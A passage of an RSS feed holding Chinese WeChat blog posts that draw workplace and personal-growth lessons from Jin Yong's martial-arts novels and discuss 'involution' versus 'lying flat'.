src="https://wechat2rss.xlab.app/img-proxy/?k=bfcd752c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLh5cWYibIgqLibglctwhWs40MPPBniccraZySWJLFXaJJloTamOO7zvX5MJv8N2DR6ISE2Hs6UndyvQ%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p>18. 形式主义的本质，是一种上级对下级的逐级的忠诚检查。（东方不败、任我行）</p><p>19. 任盈盈说任我行， “一个人武功越练越高，在武林中名气越来越大，往往性子会变”，“大权在手，生杀予夺，自然而然的会狂妄自大起来”</p><p>20. 杨莲亭也注定了只能“胡作非为”“倒行逆施”。他有才干也好，没才干也好，这个标签终究改不了。对于任盈盈、童百熊等人来说，他这叫祸害本教。但对于他来说，没有别的，一句话，这就是工作。</p><p><em>PS：如果讲究正统的工作能力，他（杨莲亭）不一定有出头之日，反而倒行逆施获得了教主的赏识。虽然价值观和手法不值得推荐，但个人价值的考究还是得考虑差异化。</em></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5528455284552846" data-s="300,640" style="" data-type="png" data-w="984" src="https://wechat2rss.xlab.app/img-proxy/?k=c44fa824&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLh5cWYibIgqLibglctwhWs40bMY85fMpsNkuLyc2UKFHMrF6cdMMdsaribmN5Gk37b0Z4gwrW0dsVOw%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p>21. 这个世界上本来没有野心，老大弱了，就有了野心。</p><p>22. 多少历史都已证明，清白 二字是永远不能自证的，是只能由组织认证的。（刘正风、令狐冲）</p><p>23. 上官云，职场 转弯，思想包袱重，过不了面子关、心态关。职场之中，越往上，风就越猛烈。</p><p><em>PS：“饭局也疯狂”也提示到老子庄子孙子已经告诉答案（老装孙子）</em></p><p>24.桃谷六仙 易怒体质 易哄体质</p><p><img data-ratio="0.5641952983725136" style="width:553.3400268554688px;height:312.20001220703125px;" data-type="png" data-w="553" src="https://wechat2rss.xlab.app/img-proxy/?k=4fce799d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLh5cWYibIgqLibglctwhWs40fTYEFEc3MLJ2u7sDBjNKLJzLNneDQYfxia0icEXIvFsl7IlGiaafXWPzw%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p>25.《鹿鼎记》的江湖上，不信爱情的人是轻盈的，如鱼得水的。追求爱情的人是沉重的，步履维艰的。谁要一门心思追求爱情，谁就铁定吃瘪。</p><p>26. 十五部作品中开会最多的是鹿鼎记。小会干大事；大会不干事。</p><p>27. 怀才就像怀孕，时间长了才能知道；但是草包却像临盆，一眼就可以分辨出来。一个男人很草包，是会迅速暴露的，尤其草包话又多的那种，几乎没有办法可以掩盖的。维度只有一个例外——草包识别不出草包。（郑克爽）</p><p>28.（坏人越来越少、江湖越来越坏）通观鹿鼎记，绝大多数都不是坏人，但因为无知、执念、盲从、惯性、短视以及潜规则的绑架，终于成了平庸之坏。平庸之恶。而无数的平庸之恶千丝万缕交织起来，就形成一张大网，把所有人网在里面。成为牢笼。整个鹿鼎记的江湖里，理想幻灭、理性难行、狭义为墟。金庸写到这里因此搁笔。他觉得没办法写下去了，他无法救赎这样的江湖，就像张无忌最后的动作一样，手一颤，一支笔掉在桌上。</p><p><img data-ratio="0.7716535433070866" style="width:508.010009765625px;height:392.010009765625px;" data-type="png" data-w="508" src="https://wechat2rss.xlab.app/img-proxy/?k=db91829f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLh5cWYibIgqLibglctwhWs40WrGibOIKxiaUia1aY45GyDKavvQMNCwsMHbf6j5Yt4BbctDuxXylFsvlw%2F640%3Fwx_fmt%3Dpng"/></p><h1 style=""><br/></h1><h1 style=""><span style="font-size: 24px;"><strong><span style="font-size: 24px;font-family: 宋体;">三、拓展分析</span></strong></span></h1><p><strong>1. 有朋友问他们一直修炼武功，行走江湖，吃什么喝什么？</strong></p><p>       古代的武功就是一种货币度量衡，现在是金钱而已。武功是一种影响力。就类似信仰一样。（例如藏区对苦行僧的尊重，信仰）</p><p><strong>2. 有朋友说武侠小说都是虚构的，没有现实参考</strong>价值。</p><p>       金庸的武侠小说，看一下主人公大多数还是挺符合一个普通人的成长史。部分还符合屌丝逆袭的套路。</p><p>    a.郭靖，开始武功很差，后来勤练降龙十八掌，大智若愚型，成就郭靖世家。</p><p>    b.张无忌，小时候很悲惨，掉山崖捡本书就开挂了…</p><p>    c.令狐冲，前期武功很平常（田伯光都打不过），后来风清扬点拨，成长、成才。</p><p>    d.当然也有一些共同点：<span style="color: rgb(255, 76, 0);"><strong>有运气成分、遇贵人</strong></span></p><p><img data-ratio="0.5551537070524413" style="width:553.3400268554688px;height:306.5400085449219px;" data-type="png" data-w="553" src="https://wechat2rss.xlab.app/img-proxy/?k=e7a7c002&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLh5cWYibIgqLibglctwhWs40ZyKlBo3G2GTDVMoyXFKBRqGFy4SRIRECJSsJTvOhqVaC3zVeKudtfw%2F640%3Fwx_fmt%3Dpng"/></p><p>    当然也符合运气守恒定律，诚然也可以说每个人都是受平衡力，无非是关门开窗还是关窗开门的区别。（例如段正淳把妹，自己也绿油油。）</p><p><strong>3. 金庸武侠的主人公 武功大成者也不是速成</strong></p><p>    a)张三丰，成名用了50多年，属于大器晚成。</p><p>    b)萧峰，练功20多年（年少积累），但出场的时候就已经很厉害了。</p><p>    c)杨过，20多年，小龙女断肠崖就16年。</p><p>    d)张无忌，5年，昆仑山白猿捡到《九阳真经》，谷中练了4年，基本也符合一万小时天才理论。</p><p>    e)当然也有类似像段誉、虚竹这种开挂的存在，大概一炷香的时间？但段誉的六脉神剑时灵时不灵；虚竹那么高强的内力，但在与丁春秋的实战环节，并没有快速碾压。开个门关个窗，基本也能说的通。</p><p><em>PS：当然部分武学大家的的作品就飘逸许多，练功速度比较快。</em></p><p><img data-ratio="0.5641952983725136" style="width:553.3400268554688px;height:311.94000244140625px;" data-type="png" data-w="553" src="https://wechat2rss.xlab.app/img-proxy/?k=876c7ea4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLh5cWYibIgqLibglctwhWs40MtexISegzGZnBoeJhCOjNj4UHZXKknaiaibkGzNWx6ev3JNIUgxLpQlg%2F640%3Fwx_fmt%3Dpng"/></p><p><strong>4. 那些独创武功的人</strong></p><ol class="list-paddingleft-2" style="list-style-type: lower-alpha;"><li><p>张三丰，太极拳、太极剑，开宗立派（武当派）</p></li><li><p>萧峰，降龙十八掌（二十八掌改）（新修版）</p></li><li><p>王重阳，先天功，开宗立派（全真教）</p></li><li><p>林朝英，玉女心经，开宗立派（古墓派）</p></li><li><p>杨过，黯然销魂掌</p></li><li><p> 老顽童，空明拳、左右互搏</p></li><li><p>东邪，落英神剑掌、碧海潮生曲（弹指神通不确定是否原创），立派（桃花岛）</p></li><li><p>西毒（蛤蟆功，逆练九阴真经）</p></li><li><p> 左冷禅，寒冰真气、精修嵩山剑法</p></li><li><p>丁春秋，化功大法（算是北冥神功的改版）、毒功，自立门派（星宿派）</p></li><li><p> 达摩、独孤求败、黄裳、段思平、慕容龙城、逍遥子…</p></li></ol><p><img data-ratio="0.5063291139240507" style="width:553.3400268554688px;height:280.1400146484375px;" data-type="png" data-w="553" src="https://wechat2rss.xlab.app/img-proxy/?k=599a04c8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLh5cWYibIgqLibglctwhWs40UKyMKibDt56vuL9mwxV5ric0JVWAQIoNxyPpiaG7AgKJfSR8PzlJjbEeQ%2F640%3Fwx_fmt%3Dpng"/></p><p>    独创，说明创新能力极强。纵观全书，基本上大多数都会表达某某武学天赋极高加上极大的动力（兴趣or耻辱），包括反面人物欧阳锋、丁春秋、左冷禅亦是如此。先有天赋再努力，开宗立派的概率才大。</p><p>==&gt;</p><p><span style="color: rgb(255, 76, 0);"><strong>IT：创新 &gt; 创业</strong></span></p>



<p><a href="2247483839">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=b05cbc10&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0NTI4MDQwMQ%3D%3D%26mid%3D2247483839%26idx%3D1%26sn%3Db5a653c90025f3b445a376703a4275b8%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 07 Oct 2021 23:08:00 +0800</pubDate>
    </item>
    <item>
      <title>吃的卷中卷 vs 躺平</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&amp;mid=2247483797&amp;idx=1&amp;sn=f7908b657219e6b9382cf409d83ee073</link>
      <description>目标对立的前提下，婊子和贞节牌坊只能要一个了。目标不完全对立的前提，鱼和熊掌也能每天吃一口，但不一定都能吃完哦。</description>
      <content:encoded><![CDATA[<p>
原创 <span>程小远</span> <span>2021-05-30 01:44</span> <span style="display: inline-block;"></span>
</p>

<p>目标对立的前提下，婊子和贞节牌坊只能要一个了。目标不完全对立的前提，鱼和熊掌也能每天吃一口，但不一定都能吃完哦。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=7b291d63&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtJpmicHtdVDDLVqNqgkwcvuU30ypFsVwCnrY2EEWrMN6tF2SNNiabWTr7XzhelAAEWXIytJP0aBwIzA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="line-height: 3em;"><span style="font-size: 18px;font-family: 等线;text-indent: 0pt;">     近来<strong>内卷</strong>和<strong>躺平</strong>这两个词流行度很高。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;line-height: 3em;"><span style="font-size: 18px;font-family: 等线;">网上有个关于内卷的段子：“江湖上有一本葵花宝典，每个人，都想得到它因为得到之后，可以天下无敌，但是有一天，葵花宝典被公开了，人人都有机会练。这是好事，还是坏事呢？这会成为一个灾难。因为一个人拥有时，练不练，是你一个人的事。大家都有了，练不练就不由自己决定了。”</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;line-height: 3em;"><span style="font-size: 18px;font-family: 等线;">过度的竞争，所以延伸出新的状态——躺平</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;line-height: 3em;"><span style="font-size: 18px;font-family: 等线;">好坏论不了，存在即合理。内卷，这是一个社会的现象，不是某个组织的专利。所以年轻人用躺平来应对，也是一种无声的反抗。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;line-height: 3em;"><span style="font-size: 18px;"><span style="font-family: 等线;">内卷，心累才是真的累（</span><strong><span style="font-family: 等线;">为了变得优秀而去努力，却不是为了喜欢而去努力</span></strong><span style="font-family: 等线;">），所以就要关注主维度是不是自己的兴趣爱好，如果只为了谋生，那可能的确卷的很痛苦。但为了兴趣而修剪自己的知识树，是自己看到自己的成长（向内，自驱），伴随着成就感就很欣慰，卷不卷无所谓，那是别人的事，少了对比（向外），专注聚焦，自然少了焦虑。<strong>正所谓吃的卷中卷，方为人上人。</strong></span></span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;line-height: 3em;"><span style="font-size: 18px;font-family: 等线;">关于躺平，李雪琴在一档节目里说的话:“躺平是每一个人的权利,任何人都无权干涉,只不过我们需要提前想好躺平的后果,我们要接受10年后与别人的差距。”</span><span style="font-size: 18px;text-indent: 21pt;">后半句还是很中肯的，接受若干年后状态就好。</span><span style="font-size: 18px;text-indent: 21pt;">但目前李雪琴的确有躺的资本。</span><span style="font-size: 18px;text-indent: 21pt;">但普通人呢？</span><span style="font-size: 18px;text-indent: 21pt;">网上统计下若干年后遗憾后悔的概率有多大呢？</span></p><section style="white-space: normal;text-align: center;line-height: 3em;"><img class="rich_pages" data-galleryid="" data-ratio="0.9025157232704403" data-s="300,640" data-w="1272" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=a0fe0d3a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtJpmicHtdVDDLVqNqgkwcvuUD1COnRcCRMTxsCuaojPl2L7fKXEcj7ias03KibIeF2W1iaQvEUMVex9NA%2F640%3Fwx_fmt%3Dpng"/></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;line-height: 3em;"><span style="text-indent: 21pt;font-size: 18px;">苏轼也有句“</span><strong style="text-indent: 21pt;font-size: 18px;">惟有王城最堪隐，万人如海一身藏。</strong><span style="text-indent: 21pt;font-size: 18px;">”26岁的他，做官才两年，正是该锐意进取的年纪。但诗中透露出来的消极情绪（佛系？豁达），颇有现代“躺平一族”的气质。但他的躺，通过历史来事后诸葛，即使他躺也能躺出意义、躺出自己。</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;line-height: 3em;"><span style="font-size: 18px;"><span style="font-family: 等线;"></span></span></section><section style="text-align: center;line-height: 3em;"><img class="rich_pages" data-galleryid="" data-ratio="0.7888349514563107" data-s="300,640" data-backh="456" data-type="png" data-w="824" style="width: 100%;height: auto;" data-backw="578" src="https://wechat2rss.xlab.app/img-proxy/?k=f7ebb86d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtJpmicHtdVDDLVqNqgkwcvuUqdy75rvV8573uibEica4pVIYibkUAManp8dd1P0WF21OZCLiaMibGRibYibiaA%2F640%3Fwx_fmt%3Dpng"/></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;line-height: 3em;"><span style="font-size: 18px;"><br/></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;line-height: 3em;"><span style="font-size: 18px;font-family: 等线;">所以，也得看怎么个躺法。有意义的<span style="font-family: 等线;text-indent: 28px;">躺</span>，还是颓废的<span style="font-family: 等线;text-indent: 28px;">躺</span>。网上多种观点，有的抨击、有的信奉。但无论谁在阐述什么观点，是不是也有社会角色赋予的“责任”？坚持自己，简单真诚就好。</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;line-height: 3em;"><span style="font-size: 18px;"><span style="font-family: 等线;">无论是内卷还是躺平，其实大家都在关心学习和成长。</span><span style="color: rgb(255, 76, 0);"><strong><span style="font-family: 等线;">学习的目的不（只）是为了知道，而是为了改变。</span></strong></span><span style="font-family: 等线;">只有改变才让成长变得有意义。而大众的痛苦、焦虑都是源于内心的贪嗔痴——人生八苦</span></span></section><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;font-family: 等线;font-weight: normal;text-indent: 21pt;line-height: 2em;"><span style="font-size: 18px;"><br/><span style="font-family: 等线;"></span></span><span style="text-indent: 21pt;width: 100%;"><img data-ratio="0.6564195298372514" style="text-indent: 21pt;font-size: 18px;width: 100%;" data-type="png" data-w="553" data-backw="553" data-backh="363" src="https://wechat2rss.xlab.app/img-proxy/?k=cd594e40&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtJpmicHtdVDDLVqNqgkwcvuU0kZJMLCwOWEkamIIHlf8U1CRCjjez1SYA5I27HmIkOf4fR4Sic8qOlA%2F640%3Fwx_fmt%3Dpng"/></span></p><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;line-height: 3em;"><span style="font-size: 18px;"><span style="font-family: 等线;">当然简单点也可以说太在意别人的看法。所以回退一个问题，为什么要成长，为什么要奋斗？对于一个</span><span style="font-family: 等线;color: rgb(255, 0, 0);">普通的俗人</span><span style="font-family: 等线;">来讲：终有一天，父母老去、孩子长大，而你需要做的，就是让他们体面的生活，你吃过的苦不能让他们再吃。体面的不为五斗米折腰。如果躺平心态的话，不结婚不生子，那不就解决50%以上的烦恼了吗？都还好，烦恼在外界都是表象，真正本质的烦恼是自己。与自己和解还是有难度、有深度。看自己。《遥远救世主》点睛一句</span><strong><span style="font-family: 等线;color: rgb(255, 76, 0);">“神即道，道法自然，如来”</span></strong><span style="font-family: 等线;">，不管是神、道、如来，最终都是让我们回到认识自己，承认自己的局限，打破世俗所认知的神、佛、道等种种依靠和妄想，从而悟出一份平常心，实事求是，从这个基点起步，行住坐卧都是道，每走一步都算数，所有的知识、哲学、宗教都不过是垫脚石.</span></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;line-height: 3em;"><span style="text-indent: 21pt;font-size: 17px;width: 100%;"></span><img data-ratio="0.620253164556962" style="text-indent: 21pt;font-size: 18px;width: 100%;" data-type="png" data-w="553" data-backw="578" data-backh="359" src="https://wechat2rss.xlab.app/img-proxy/?k=85a9318b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtJpmicHtdVDDLVqNqgkwcvuUQuTkFibsUNb0O3BCouJgcnfsWePObe8F057vyDwXWicDUicnRNV5pOzAA%2F640%3Fwx_fmt%3Dpng"/></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;line-height: 3em;"><span style="font-family: 等线;font-weight: bold;color: rgb(255, 76, 0);font-size: 18px;">目标对立的前提下，婊子和贞节牌坊只能要一个了。目标不完全对立的前提，鱼和熊掌也能每天吃一口，但不一定都能吃完哦。</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;line-height: 3em;"><span style="font-size: 18px;font-family: 等线;">身体和灵魂，总有一个要在路上。是做一个痛苦的苏格拉底好，还是做一个快乐的猪更好？</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;line-height: 3em;"><span style="font-size: 18px;"><span style="font-family: 等线;">世间所有的道理，如果不是自己悟出来，谁告诉你都没用，因为人只有悟到才能听到，看到想到接着说到做到，你点头认同的，</span><span style="font-family: 等线;color: rgb(255, 76, 0);"><strong>从来都只是自身已有的东西得到了印证而已，</strong></span><span style="font-family: 等线;">即便是真理如果没有变成你的信念，就根本指导不了你的人生。也就这么一听而已。（包括我这一条）</span></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 3em;"><span style="font-family: 等线;font-size: 18px;"><img data-ratio="1.0054249547920433" data-backh="556" data-type="png" data-w="553" style="width: 100%;height: auto;" data-backw="553" src="https://wechat2rss.xlab.app/img-proxy/?k=ea92e797&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtJpmicHtdVDDLVqNqgkwcvuUjO1VzOpLvVhfq9qQrUxWQtXn7cdYpT018Gk65gIkF6nJqaYj4C6T8Q%2F640%3Fwx_fmt%3Dpng"/></span></section><section style="text-align: center;line-height: 3em;"><br/></section>



<p><a href="2247483797">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=9b406167&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0NTI4MDQwMQ%3D%3D%26mid%3D2247483797%26idx%3D1%26sn%3Df7908b657219e6b9382cf409d83ee073%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sun, 30 May 2021 01:44:00 +0800</pubDate>
    </item>
    <item>
      <title>武学大家治学传承赏析</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&amp;mid=2247483773&amp;idx=1&amp;sn=f0aee3d86bc5e0a2b3866fe93be223e2</link>
      <description>武学大家治学传承心态赏析:扫地僧、风清扬、独孤...</description>
      <content:encoded><![CDATA[<p>
原创 <span>sm0nk</span> <span>2020-06-27 16:08</span> <span style="display: inline-block;"></span>
</p>

<p>武学大家治学传承心态赏析:扫地僧、风清扬、独孤...</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=103eaa7b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtIngJaZECgia1JUfh7ia0kfAFyy3G7rwSesdUpa55jqibCvkeHVE4swLfichom7LWmZG1JicD531JsyLvw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="display: none;" data-tools="新媒体管家" data-label="powered by xmt.cn"><br/></section><p>端午期间翻了翻陈墨的赏析金庸，想来还是闭环输出点看法。<br/></p><p><br/></p><p><span style="font-size: 24px;">1. 扫地僧</span></p><p><strong>面门出入，应物随情，自在无碍，所作皆成。</strong></p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.6086956521739131" data-s="300,640" style="" data-type="jpeg" data-w="920" src="https://wechat2rss.xlab.app/img-proxy/?k=d9c89e20&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtIngJaZECgia1JUfh7ia0kfAFIQm2sM2713wWd8RU0L5ypVeXP9iaZQMkVkvDOYStgRP1xicVkubYOoRw%2F640%3Fwx_fmt%3Djpeg"/></p><p>      这一句不是原著自带，是张纪中版的天龙八部电视剧增添的。</p><p>      出自现代一位居士所作《心王铭》。“面门出入，应物随情。自在无碍，所作皆成。”大约是说做一件事就专注的用它的体系，尊重它的规律，做这件事就想这件事，做这件事就尽力去做。专注当下，不要三心二意生出干扰，尽力而为，不要浅尝辄止轻易放弃。专注、尽力、少些私心杂念，用最努力的心境去着眼于事情本原，那么便没有什么做不成的。</p><p>      <strong>关键字：体系、规律、单维专注、本原</strong></p><p><strong>武学障 - 佛法化解</strong></p><p><span style="font-size: 15px;"><em>      那老僧道：“不是危言耸听。本派武功传自达摩老祖。佛门子弟学武，乃在强身健体，护法伏魔。修习任何武功之时，务须心存慈悲仁善之念。倘若不以佛学为基，则练武之时，必定伤及自身。功夫练得越深，自身受伤越重。如所练的只不过是拳打脚踢、兵刃暗器的外门功夫，那也罢了，对自身危害甚微，只须身子强壮，尽自抵御得住……”</em></span></p><p><span style="font-size: 15px;"><em>那老僧见众僧上来，全不理会，继续说道：“但如练的是本派上乘武功，例如拈花指、多罗叶指、般若掌之类，每日不以慈悲佛法调和化解，则戾气深入脏腑，愈陷愈深，比之任何外毒都要厉害百倍。大轮明王原是我佛门弟子，精研佛法，记诵析理，当世无双，但如不存慈悲布施、普渡众生之念，虽然典籍淹通，妙辩无碍，终不能消解修习这些上乘武功时所中的戾气。”</em></span></p><p><span style="font-size: 15px;"><em>      那老僧续道：“本寺七十二绝技，每一项功夫都能伤人要害、取人性命，凌厉狠辣，大干天和，是以每一项绝技，均须有相应的慈悲佛法为之化解。这道理本寺僧人却也并非人人皆知，一个人武功越练越高之后，禅理上的领悟，自然而然会受到障碍。在我少林派，便叫做‘<span style="color: rgb(223, 64, 42);">武学障</span>’，与别宗别派的‘知见障’道理相同。要知佛法在求渡世，武功在求杀生，两者背道而驰，相互克制。只有佛法越高，慈悲之念越盛，武功绝技方能练得越多，但修为上到了如此境界的高僧，却又不屑去多学诸般厉害的杀人法门了。”</em></span></p><p><strong>武学障&amp;知见障</strong></p><p>      本意讲对立两方向杀人戾气vs慈悲之念，武功再高需要佛法化解。参考儒释道，例如，保安大哥的三大哲学问题“你是谁？来自哪？来干什么？”（说是戏谑，其实还是需要明白些）工作中技术成长、市场关系突破等 一定阶段后都需要<span style="color: rgb(255, 0, 0);"><strong>更了解认识自己</strong></span>（烦恼呈阶段性需要，位高则负担压力重，正相关）。得到自己认可，自己通透则所有通透，通则不痛？</p><p><br/></p><p><span style="font-size: 24px;">2. 风清扬</span></p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.7057902973395931" data-s="300,640" style="" data-type="jpeg" data-w="639" src="https://wechat2rss.xlab.app/img-proxy/?k=55361525&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtIngJaZECgia1JUfh7ia0kfAFsV2QlJYf4l4jE9Kt4XFhAiaeQ0pLjG6C6oSeU7EibQruicn8rgmLYiaAcQ%2F640%3Fwx_fmt%3Djpeg"/></p><p><span style="font-size: 15px;"><em>        风清扬道：“五岳剑派中各有无数蠢才，以为将师父传下来的剑招学得精熟，自然而然便成高手，哼哼，熟读唐诗三百首，不会作诗也会吟！熟读了人家诗句，做几首打油诗是可以的，但若不能自出机抒，能成大诗人么？”他这番话，自然是连岳不群也骂在其中了，但令狐冲一来觉得这话十分有理，二来他并未直提岳不群的名字，也就没加抗辩。</em></span></p><p><span style="font-size: 15px;"><em>　　风清扬道：“活学活使，只是第一步。要做到出手无招，那才真是踏入了高手的境界。你说‘各招浑成连绵，敌人便没法可破’，这句话还只说对了一小半。不是‘浑成’，而是根本无招。你的剑招使得再浑成，只要有迹可寻，敌人便有隙可乘。但如你根本并无招式，敌人如何来破你的招式？”</em></span></p><p><span style="font-size: 15px;"><em>　　令狐冲一颗心怦怦乱跳，手心发热，喃喃地道：“根本无招，如何可破？根本无招，如何可破？”陡然之间，眼前出现了一个生平从所未见、连做梦也想不到的新天地。</em></span></p><p>      模仿的确非常重要，学习之基础。其实好多终其一生也是在模仿，但比不模仿也好太多了。若更上一层楼，都需要创新及创造性思维，欧阳锋的人物刻画在武学角度很成功的，走火入魔后还能融会贯通（逆行倒施），达到了自己武功天下第一的目标（射雕）。现在信息很发达，学习资料也很多，学时学不完了，<strong>举一反三式融会贯通</strong>的独具一格优势就比较明显，现在好多互联网大厂，对高端技术和管理都需要有<span style="color: rgb(255, 0, 0);"><strong>无中生有</strong></span>的能力，毕竟做对的事情比把事情做对能量大很多。</p><p><br/></p><p><span style="font-size: 24px;">3. 张三丰</span></p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.692" data-s="300,640" style="" data-type="jpeg" data-w="500" src="https://wechat2rss.xlab.app/img-proxy/?k=bb6511f0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtIngJaZECgia1JUfh7ia0kfAFchK7vu6Jo5UJP2WLticqpD8LgIPt0ZQOcUWWnoXiakmITUqoW1eV0FxQ%2F640%3Fwx_fmt%3Djpeg"/></p><p><strong>关注点：忘记了多少？</strong></p><p>       <em><span style="font-size: 15px;">只听张三丰问道：“孩儿，你看清楚了没有？”张无忌道：“看清楚了。”张三丰道：“都记得了没有？”张无忌道：“已忘记了一小半。”张三丰道：“好，那也难为了你。你自己去想想吧。”张无忌低头默想。过了一会，张三丰问道：“现下怎样了？”张无忌道：“已忘记了一大半。”</span></em></p><p><em><span style="font-size: 15px;">　　周颠失声叫道：“糟糕！越来越忘记得多了。张真人，你这路剑法十分深奥，看一遍怎记得了？请你再使一遍给我们教主瞧瞧吧。”</span></em></p><p><em><span style="font-size: 15px;">　　张三丰微笑道：“好，我再使一遍。”提剑出招，演将起来。众人只看了数招，心下大奇，原来第二次所使，和第一次使的竟然没一招相同。周颠叫道：“糟糕，糟糕！这可更叫人糊涂啦。”张三丰画剑成圈，问道：“孩儿，怎样啦？”张无忌道：“还有三招没忘记。”张三丰点点头，放剑归座。</span></em></p><p><em><span style="font-size: 15px;">　　张无忌在殿上缓缓踱了一个圈子，沉思半晌，又缓缓踱了半个圈子，抬起头来，满脸喜色，叫道：“这我可全忘了，忘得干干净净的了。”张三丰道：“不坏，不坏！忘得真快，你这就请八臂神剑指教吧！”说着将手中木剑递了给他。张无忌躬身接过，转身向方东白道：“方前辈请。”周颠抓耳搔头，满心担忧。<span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">  </span></span></em><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">  </span></p><p>      